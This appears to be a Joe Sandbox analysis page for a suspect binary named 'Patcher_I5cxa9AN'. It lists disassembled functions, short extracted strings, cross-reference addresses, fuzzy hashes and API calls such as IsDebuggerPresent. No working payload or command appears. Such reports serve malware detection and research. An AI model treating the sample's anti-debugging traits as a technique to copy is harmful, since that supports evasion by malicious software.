O, xrefs: 6CE17E1F
K, xrefs: 6CE17720
M, xrefs: 6CE17E27
l, xrefs: 6CE17583
h, xrefs: 6CE175C2
f, xrefs: 6CE1758A
{, xrefs: 6CE17616
r, xrefs: 6CE17647
r, xrefs: 6CE175EC
y, xrefs: 6CE17893
O, xrefs: 6CE17831
!, xrefs: 6CE17694
H, xrefs: 6CE176A2
y, xrefs: 6CE1788C
p, xrefs: 6CE17640
c, xrefs: 6CE175D7
2, xrefs: 6CE1780E
#, xrefs: 6CE1774A
|, xrefs: 6CE175D0
?, xrefs: 6CE177F9
l, xrefs: 6CE175C9
s, xrefs: 6CE17870
#, xrefs: 6CE1777B
>, xrefs: 6CE17655
y, xrefs: 6CE175E5
A, xrefs: 6CE17877
{, xrefs: 6CE1789A
S, xrefs: 6CE17E0F
o, xrefs: 6CE177C1
L, xrefs: 6CE17663
a, xrefs: 6CE174B3
n, xrefs: 6CE175DE
V, xrefs: 6CE176E8
t, xrefs: 6CE1761D
), xrefs: 6CE1779E
I, xrefs: 6CE174C8
T, xrefs: 6CE17608
-, xrefs: 6CE17782

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: !$"$#$#$#$'$'$)$*$-$0$0$1$2$8$;$=$>$?$A$A$D$D$D$F$H$I$K$L$L$M$M$M$O$O$O$P$Q$Q$R$R$S$T$T$T$V$V$Z$Z$]$^$^$^$_$`$`$a$b$c$d$d$f$h$h$i$i$l$l$n$o$p$q$q$r$r$r$s$t$t$w$y$y$y$y$z$z${${${${${${${${${$|$}
API String ID: 0-4015154578
Opcode ID: a228b4d6bfd944f582c200887995b59aa6e8aa789002c7a8eba53aaada564ba5
Instruction ID: 7d7f35be1785daaf393fe4c995fbbf25b34242b03a8310db5a1b879a4456854b
Opcode Fuzzy Hash: a228b4d6bfd944f582c200887995b59aa6e8aa789002c7a8eba53aaada564ba5
Instruction Fuzzy Hash: 23C22631E082A48BCB15CA7CCC503DDBBB16B56328F1942EDD4A9AB7C1D7784D85CB91

Function 6CE0B9E0 Relevance: 85.8, Strings: 67, Instructions: 2033COMMON

Download Yara Rule

Strings

f, xrefs: 6CE0D614
Y, xrefs: 6CE0C9E9
[, xrefs: 6CE0D5BC
4, xrefs: 6CE0D2D8
I, xrefs: 6CE0D62C
, xrefs: 6CE0BE44
|, xrefs: 6CE0C83C
8, xrefs: 6CE0C3B8
W, xrefs: 6CE0D59C
+, xrefs: 6CE0D4C4
`, xrefs: 6CE0CB6C
[, xrefs: 6CE0C9F9
`, xrefs: 6CE0C5B2
K, xrefs: 6CE0C53B
E, xrefs: 6CE0CA09
$, xrefs: 6CE0C418
$, xrefs: 6CE0BB41
D, xrefs: 6CE0D72F
2, xrefs: 6CE0D4E4
5, xrefs: 6CE0D248
", xrefs: 6CE0D298
<, xrefs: 6CE0BCC7
b, xrefs: 6CE0C84C
Q, xrefs: 6CE0D56C
&, xrefs: 6CE0C408
D, xrefs: 6CE0D524
9, xrefs: 6CE0D2A8
%, xrefs: 6CE0C420
G, xrefs: 6CE0CA19
*, xrefs: 6CE0C428
E, xrefs: 6CE0D60C
?, xrefs: 6CE0D308
G, xrefs: 6CE0D61C
S, xrefs: 6CE0D57C
c, xrefs: 6CE0C854
U, xrefs: 6CE0D58C
x, xrefs: 6CE0D5A4
t, xrefs: 6CE0C061
Y, xrefs: 6CE0CC7A
C, xrefs: 6CE0D514
Y, xrefs: 6CE0D5AC
:, xrefs: 6CE0D2C8
(, xrefs: 6CE0D4A4
P, xrefs: 6CE0BD97
L, xrefs: 6CE0D504
F, xrefs: 6CE0D534
_, xrefs: 6CE0C9D9
", xrefs: 6CE0C3E8
<, xrefs: 6CE0C3D8
H, xrefs: 6CE0D624
3, xrefs: 6CE0C1CF
F, xrefs: 6CE0CA11
x, xrefs: 6CE0C81C
1, xrefs: 6CE0D4F4
`, xrefs: 6CE0C85C
~, xrefs: 6CE0C82C
`, xrefs: 6CE0CC72
J, xrefs: 6CE0C533
[, xrefs: 6CE0D4D4
], xrefs: 6CE0D5CC
_, xrefs: 6CE0D5DC
, xrefs: 6CE0C3F8
C, xrefs: 6CE0D5FC
>, xrefs: 6CE0C3C8
U, xrefs: 6CE0D4B4
A, xrefs: 6CE0D5EC
D, xrefs: 6CE0D997

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: $ $"$"$$$$$%$&$($*$+$1$2$3$4$5$8$9$:$<$<$>$?$A$C$C$D$D$D$E$E$F$F$G$G$H$I$J$K$L$P$Q$S$U$U$W$Y$Y$Y$[$[$[$]$_$_$`$`$`$`$b$c$f$t$x$x$|$~
API String ID: 0-3106034677
Opcode ID: c5b9a8a5b109f051144e84cd24b42691e6e08be00f51fa9e5c18e900e6a18f2c
Instruction ID: d797e1febcd59a9e6dab8ed4d6ad44abd398304af3d9938891d39c8169781b5b
Opcode Fuzzy Hash: c5b9a8a5b109f051144e84cd24b42691e6e08be00f51fa9e5c18e900e6a18f2c
Instruction Fuzzy Hash: 0B13C37560C7C08BD3209B38888439FBBF1AB96328F184A6DD5E8877D2D7798545C793

Function 6CE1F796 Relevance: 20.5, Strings: 16, Instructions: 452COMMON

Download Yara Rule

Strings

2E1G, xrefs: 6CE20316
TN, xrefs: 6CE1FD24
\], xrefs: 6CE2032C
8I>K, xrefs: 6CE202F5
KI, xrefs: 6CE1FD2F
u5F7, xrefs: 6CE1FE0B
H1J3, xrefs: 6CE1FE00
_-l/, xrefs: 6CE1FDF5
U%W', xrefs: 6CE1FDDF
!S#], xrefs: 6CE1FB80
D)c+, xrefs: 6CE1FFD6
=?, xrefs: 6CE2000D
Rg, xrefs: 6CE1FC47
>g, xrefs: 6CE1FC70
tEwG, xrefs: 6CE2004F
b%`', xrefs: 6CE1FFF7

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: =?$!S#]$2E1G$8I>K$>g$D)c+$H1J3$KI$Rg$TN$U%W'$\]$_-l/$b%`'$tEwG$u5F7
API String ID: 0-3662867774
Opcode ID: 09179243d65148efc24872ead171a4080666fb20b5b91006b602526e4d9e2f43
Instruction ID: 924ff5aa97e376a070da1680c37c56a432f9e35137f789a0732e0c6a0170509d
Opcode Fuzzy Hash: 09179243d65148efc24872ead171a4080666fb20b5b91006b602526e4d9e2f43
Instruction Fuzzy Hash: F442D8B520C7C58AD334CF64D442BCBBAF2AB92344F00892DD4D95B682D7B5464ACB97

Function 6CE3C370 Relevance: 13.9, Strings: 11, Instructions: 127COMMON

Download Yara Rule

Strings

1, xrefs: 6CE3C40B
k, xrefs: 6CE3C3C3
S, xrefs: 6CE3C406
j, xrefs: 6CE3C3BE
2, xrefs: 6CE3C3B9
3, xrefs: 6CE3C415
h, xrefs: 6CE3C3C8
:, xrefs: 6CE3C4C3
2, xrefs: 6CE3C410
E, xrefs: 6CE3C4BE
D, xrefs: 6CE3C4B9

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 1$2$2$3$:$D$E$S$h$j$k
API String ID: 0-4017680825
Opcode ID: d6c5bfd2c76fbd68f73ae84965bfb5909a90a5f86d55f7b18d97692f14ecdaf3
Instruction ID: 3f66031db88eb187f1cc396ec0a198638d7a41bb7761b5372a4e90226ade4277
Opcode Fuzzy Hash: d6c5bfd2c76fbd68f73ae84965bfb5909a90a5f86d55f7b18d97692f14ecdaf3
Instruction Fuzzy Hash: 1841C57110C3E04AD3019A39C49035BBFE1ABD6328F688B5DE5D947782D6BAC40AC753

Function 6CE02710 Relevance: 12.9, Strings: 10, Instructions: 420COMMON

Download Yara Rule

Strings

^UG], xrefs: 6CE0280A
;2>%, xrefs: 6CE0274D
.Vfh, xrefs: 6CE02765
w, xrefs: 6CE02ACD
#)4l, xrefs: 6CE0272D
YX, xrefs: 6CE028EB
KIEH, xrefs: 6CE0281A
}#q2, xrefs: 6CE02755
vU, xrefs: 6CE02872
EIG@, xrefs: 6CE02822

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: #)4l$.Vfh$;2>%$EIG@$KIEH$YX$^UG]$vU$w$}#q2
API String ID: 0-1067521788
Opcode ID: fe073e6c0b40336e76d3a1c8aafd90c9efebf745bba613a52674b0a06c00a51b
Instruction ID: e0d9cac8a2cb89ba3fe8ba45c797b913ae956a1d0f59791995227db5a5696c45
Opcode Fuzzy Hash: fe073e6c0b40336e76d3a1c8aafd90c9efebf745bba613a52674b0a06c00a51b
Instruction Fuzzy Hash: A5C1C27160C3928BD311CF29846475BBFF0AFD7358F184A6CE4D59B781D279890ACBA2

Function 6CE059AE Relevance: 11.4, Strings: 9, Instructions: 113COMMON

Download Yara Rule

Strings

eTbj, xrefs: 6CE05B8A
{H{N, xrefs: 6CE05B44
=D$Z, xrefs: 6CE05B62
^8>, xrefs: 6CE05B1C
l\hR, xrefs: 6CE05B76
T$X:, xrefs: 6CE05B12
-X ^, xrefs: 6CE05B6C
[ W&, xrefs: 6CE05B08
!hin, xrefs: 6CE05B94

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: !hin$-X ^$=D$Z$T$X:$[ W&$^8>$eTbj$l\hR${H{N
API String ID: 0-4204190240
Opcode ID: c15af351aa364fd97cd42c381c42bf47128913d0386ffd3b6bed7285b813285d
Instruction ID: 5d27315d00978e12735bfe315f525e8d50ec2a5d17a52ed27752dff7a5551be9
Opcode Fuzzy Hash: c15af351aa364fd97cd42c381c42bf47128913d0386ffd3b6bed7285b813285d
Instruction Fuzzy Hash: E2511CB4925340CFE718CF61CA88BA87FA1BB05300F5A82EDC2596F232C7759446CF98

Function 6CE19EC0 Relevance: 10.5, Strings: 8, Instructions: 500COMMON

Download Yara Rule

Strings

Q45J, xrefs: 6CE19FE0
t, xrefs: 6CE19F6F
J0U6, xrefs: 6CE19FD5
WQ, xrefs: 6CE1A2AD
*+, xrefs: 6CE1A2C5
8p>, xrefs: 6CE19FBF
<Q2, xrefs: 6CE19FCA
m$n:, xrefs: 6CE19FB7

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: <Q2$8p>$*+$J0U6$Q45J$m$n:$t$WQ
API String ID: 0-3771608038
Opcode ID: e3e834579e9f3bd73e5ad3ee4f3b7eaee29074d0e0921ce408ede36c5bcc48a3
Instruction ID: a313321eb851e6fe2e895107b913bc1cc99243bf0a07ea47ae860e29c87ae9d4
Opcode Fuzzy Hash: e3e834579e9f3bd73e5ad3ee4f3b7eaee29074d0e0921ce408ede36c5bcc48a3
Instruction Fuzzy Hash: 39D1E0B16483018BD724CF25C86176BB7F2FFD2358F188A2CE4868BB94E7799509C752

Function 6CE159A0 Relevance: 9.2, Strings: 7, Instructions: 462COMMON

Download Yara Rule

Strings

xy, xrefs: 6CE15CE4
Vmno, xrefs: 6CE15E83, 6CE15E90
$Akw, xrefs: 6CE15E33
]_, xrefs: 6CE15A48
RB, xrefs: 6CE15A58
1Akw, xrefs: 6CE15E7C
L], xrefs: 6CE15A50

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: $Akw$1Akw$L]$RB$Vmno$]_$xy
API String ID: 0-3231349015
Opcode ID: db664698b596bc3370e2f0c66259ca70e89d82db1b64d1284c14dc7c6254fff4
Instruction ID: e17dae468484cb6113b572f0d41808bde8cca5b0d84cb159416308f1c46ac8e2
Opcode Fuzzy Hash: db664698b596bc3370e2f0c66259ca70e89d82db1b64d1284c14dc7c6254fff4
Instruction Fuzzy Hash: 32C1CCB56593108BC314DF28C89176BB7F2EFC2318F298A1DE8D58B790E7788905C796

Function 6CE02450 Relevance: 7.8, Strings: 6, Instructions: 272COMMON

Download Yara Rule

Strings

D6B;, xrefs: 6CE02514
E, xrefs: 6CE02544
+:J6, xrefs: 6CE024FC
>><3, xrefs: 6CE0250C
9woI, xrefs: 6CE02504
R, xrefs: 6CE025A9

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: +:J6$9woI$>><3$D6B;$E$R
API String ID: 0-2244865498
Opcode ID: ee437c66c9a17491734ddf5e7feb17df2a77b21eca3b2907d6550661888a964a
Instruction ID: c78391d455d85354c976db7674be782123a8954e0f5832fcfa1f97eec442f23b
Opcode Fuzzy Hash: ee437c66c9a17491734ddf5e7feb17df2a77b21eca3b2907d6550661888a964a
Instruction Fuzzy Hash: 2B61F36024D3C18AD3019F3594A435BFFF1AFA3308F28596DE8D00B382D376811A97A7

Function 6CE38C30 Relevance: 6.8, Strings: 5, Instructions: 542COMMON

Download Yara Rule

Strings

>89, xrefs: 6CE38C9B
f, xrefs: 6CE38EAD
S"(w, xrefs: 6CE38D20
S"(w, xrefs: 6CE38F4C
>89, xrefs: 6CE38D11, 6CE38D4C

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: >89$>89$S"(w$S"(w$f
API String ID: 0-2207180035
Opcode ID: 94717645699ac3882850ceba0695724713d8250f6e47f28d002b85b5a4421d6e
Instruction ID: c6dd99c8307203d46e7d7a69b1dc1ea9935945f7f9771fd51be482ae0160cc5f
Opcode Fuzzy Hash: 94717645699ac3882850ceba0695724713d8250f6e47f28d002b85b5a4421d6e
Instruction Fuzzy Hash: 0112B17460D3519FD314CF15C89072BBBF2ABC5328F249A2DE4A95B7A1C775E805CB82

Function 6CDFD6E0 Relevance: 6.7, Strings: 5, Instructions: 474COMMON

Download Yara Rule

Strings

), xrefs: 6CDFD75C
IDAT, xrefs: 6CDFDB61
), xrefs: 6CDFD766
IHDR, xrefs: 6CDFDAF1
IEND, xrefs: 6CDFDBCF

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: b66725c3e89e8cfa2be4c1ea004f1640411405e14ed56354baf25f957000adf2
Instruction ID: 5b4e5a19ce8d7c187fb443facbb0b75979c4afb487f864501ed5c549a1505368
Opcode Fuzzy Hash: b66725c3e89e8cfa2be4c1ea004f1640411405e14ed56354baf25f957000adf2
Instruction Fuzzy Hash: B1021570608380CFD700CF28D89075ABBE1FB96308F16852DE9958B7A2D775D91ACB92

Function 6CE24B30 Relevance: 6.3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

Strings

5F&D, xrefs: 6CE24B4A
+$e, xrefs: 6CE24C83
b`, xrefs: 6CE24B92
n8l, xrefs: 6CE24B7A
+$e, xrefs: 6CE24C0C

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: +$e$+$e$5F&D$b`$n8l
API String ID: 0-2165861206
Opcode ID: 9818cea51f5c5ffd9ddeb76c33e20014433efacae6250bd8ad583e0e25a804b1
Instruction ID: 3657ee4f9d7c8d1fd499b77b07167e69b176b1298575bbd58e0fdc7e19aed192
Opcode Fuzzy Hash: 9818cea51f5c5ffd9ddeb76c33e20014433efacae6250bd8ad583e0e25a804b1
Instruction Fuzzy Hash: C03184B1249350DAD320CF6598A270FBBE0EBC6308F555D2DF2A56B281C3B28915CB4A

Function 6CDE794A Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDE7956
IsDebuggerPresent.KERNEL32 ref: 6CDE7A22
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDE7A42
UnhandledExceptionFilter.KERNEL32(?), ref: 6CDE7A4C

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 291e4b522d2348f10a736071079feb51c6da6a23fe7d779717f48d618f2c9e79
Instruction ID: fda63fa200eb451eced8df92d8b68cd05e7dd8ca483e8260b9ae97cfde31e6d9
Opcode Fuzzy Hash: 291e4b522d2348f10a736071079feb51c6da6a23fe7d779717f48d618f2c9e79
Instruction Fuzzy Hash: B2313875D0521CEBDB51DFA0D989BCCBBB8BF08304F1041AAE40CAB250EB709B898F55

Function 6CE351D0 Relevance: 5.9, Strings: 4, Instructions: 904COMMON

Download Yara Rule

Strings

)*+, xrefs: 6CE35215
q, xrefs: 6CE3589B
Z[, xrefs: 6CE35796
?<, xrefs: 6CE358B3

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: )*+$?<$Z[$q
API String ID: 0-2964544060
Opcode ID: dd92db4cdd059faca726fd205da3cb1eae3fa81b86723ec4fcb5a00d39754049
Instruction ID: 609b7265de4bc3373b23ab21a3bac92a1c0ff680be6fdf26d43c22b9b5668584
Opcode Fuzzy Hash: dd92db4cdd059faca726fd205da3cb1eae3fa81b86723ec4fcb5a00d39754049
Instruction Fuzzy Hash: 4452DC716093518FD314CF65C88179BBBF1EF85318F288A2DE5998B391D778E809CB92

Function 6CE063C7 Relevance: 5.6, Strings: 4, Instructions: 603COMMON

Download Yara Rule

Strings

0$nd, xrefs: 6CE06852
3'$!, xrefs: 6CE06836
*3u&, xrefs: 6CE0684B
{v}0, xrefs: 6CE06859

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: *3u&$0$nd$3'$!${v}0
API String ID: 0-108575719
Opcode ID: fb6a845ba7d30357fa70881062795ff642a9e2220a6b3c96f544bcc61b733500
Instruction ID: 32c85379ca56270e037ed665f737693f3188cb9783b5c3e416a91dfc60c08658
Opcode Fuzzy Hash: fb6a845ba7d30357fa70881062795ff642a9e2220a6b3c96f544bcc61b733500
Instruction Fuzzy Hash: BC12CDB0204B428FD3198F29C4A0752FBF1FF46318B28965CD4A68BB51D779E496CBD4

Function 6CE040F0 Relevance: 5.4, Strings: 4, Instructions: 357COMMON

Download Yara Rule

Strings

~, xrefs: 6CE042F5
2>><, xrefs: 6CE04102
B, xrefs: 6CE0410E
89, xrefs: 6CE04282

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 2>><$89$B$~
API String ID: 0-1020998186
Opcode ID: fa87ad201d95b52175407a9504c3669850dbd0fb9eb8407434e53dcd2b7c20fc
Instruction ID: fbbf3b1e4da957eac2969a4b9c7b6c60aaf301295592b9433807efe12eb9c7d0
Opcode Fuzzy Hash: fa87ad201d95b52175407a9504c3669850dbd0fb9eb8407434e53dcd2b7c20fc
Instruction Fuzzy Hash: EBC19FB120D3919BD304CF18D59036BBBE2ABD231CF24896DE4E54B791D776C91ACB82

Function 6CE155FE Relevance: 5.3, Strings: 4, Instructions: 329COMMON

Download Yara Rule

Strings

sp, xrefs: 6CE15843
K,K", xrefs: 6CE15683
#, xrefs: 6CE1564B
# , xrefs: 6CE1568B

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: #$# $K,K"$sp
API String ID: 0-28392184
Opcode ID: f155f8bd5cc5a6859a9c7b7a553625201f4fe00222aeecbdde9331943e9a0134
Instruction ID: 99d7141eef6d6835b521a2913e386de8116e246ca190509aa9c67e84da58beeb
Opcode Fuzzy Hash: f155f8bd5cc5a6859a9c7b7a553625201f4fe00222aeecbdde9331943e9a0134
Instruction Fuzzy Hash: FD81BF71A0D3118BC314DF25C8A236BB7F2EF82328F189A5CE4D64BB91E3B48555C796

Function 6CDEB917 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDEBA0F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDEBA19
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDEBA26

Memory Dump Source

Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true

Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f162a81e61dfc4cb589ec210cc538cd71f4144af968be43217983d397245f931
Instruction ID: d2810ce6946328cf293bf08a5123d23d9e96f753f8a035aaecaa621505dfd3b3
Opcode Fuzzy Hash: f162a81e61dfc4cb589ec210cc538cd71f4144af968be43217983d397245f931
Instruction Fuzzy Hash: A831C274901328EBCB61DF64D9887CDBBB8BF08314F5041EAE41CA72A1E7709B858F55

Function 6CE02BA0 Relevance: 4.1, Strings: 3, Instructions: 379COMMON

Download Yara Rule

Strings

Bz, xrefs: 6CE02EC1
/, xrefs: 6CE02D8E
=, xrefs: 6CE02C13

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: /$=$Bz
API String ID: 0-2282713308
Opcode ID: 8ab862868460b80af7fde9ac6c9379d1827d374d6450764770d5b9c237bcd28c
Instruction ID: a407bcb406faaf0543a3cbb98e89670703d86166b349b51fede8683314c4b9a7
Opcode Fuzzy Hash: 8ab862868460b80af7fde9ac6c9379d1827d374d6450764770d5b9c237bcd28c
Instruction Fuzzy Hash: 0DC1D0B12087808FE314CF25D894BABBBE5EFD5308F24492DE1D58B392DB798509CB46

Function 6CE0EE3E Relevance: 3.9, Strings: 3, Instructions: 146COMMON

Download Yara Rule

Strings

13, xrefs: 6CE0EE82
4=, xrefs: 6CE0EF1C
%', xrefs: 6CE0EE61

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: 4=$%'$13
API String ID: 0-3741504512
Opcode ID: 0577566d69644ed9dca813068b24ae473dbbd59ea5134ac4cec7557243218c39
Instruction ID: 18a4faa04db59d74bfd0d5fc4cdaadd616da679caf32ca3bd1b809f8745c8d0c
Opcode Fuzzy Hash: 0577566d69644ed9dca813068b24ae473dbbd59ea5134ac4cec7557243218c39
Instruction Fuzzy Hash: 83510FB460A3C28BE7719F11E4997ABBBF8BF86344F604E1DC4C95A205DB344245CB97

Function 6CE1B9B0 Relevance: 3.0, Strings: 2, Instructions: 461COMMON

Download Yara Rule

Strings

^ky, xrefs: 6CE1BBAA
?<, xrefs: 6CE1B9DC

Memory Dump Source

Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true

Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd

Similarity

API ID:
String ID: ?<$^ky
API String ID: 0-2910754955
Opcode ID: d4849ebae9f9c9730207edd16bc98ff39b0fde52d7e5e2f37b30c9c407ecc92a
Instruction ID: 01e9181ba410a0016f17a6fba2cfba7ee72e362182e40ced5bf96207f70a9d87
Opcode Fuzzy Hash: d4849ebae9f9c9730207edd16bc98ff39b0fde52d7e5e2f37b30c9c407ecc92a
Instruction Fuzzy Hash: 1CC103B1E183008BD7148F24C891B6BB7F1EF8531CF28896CE88597B91E735D919C792

Function 6CE16320 Relevance: 2.8, Strings: 2, Instructions: 295COMMON

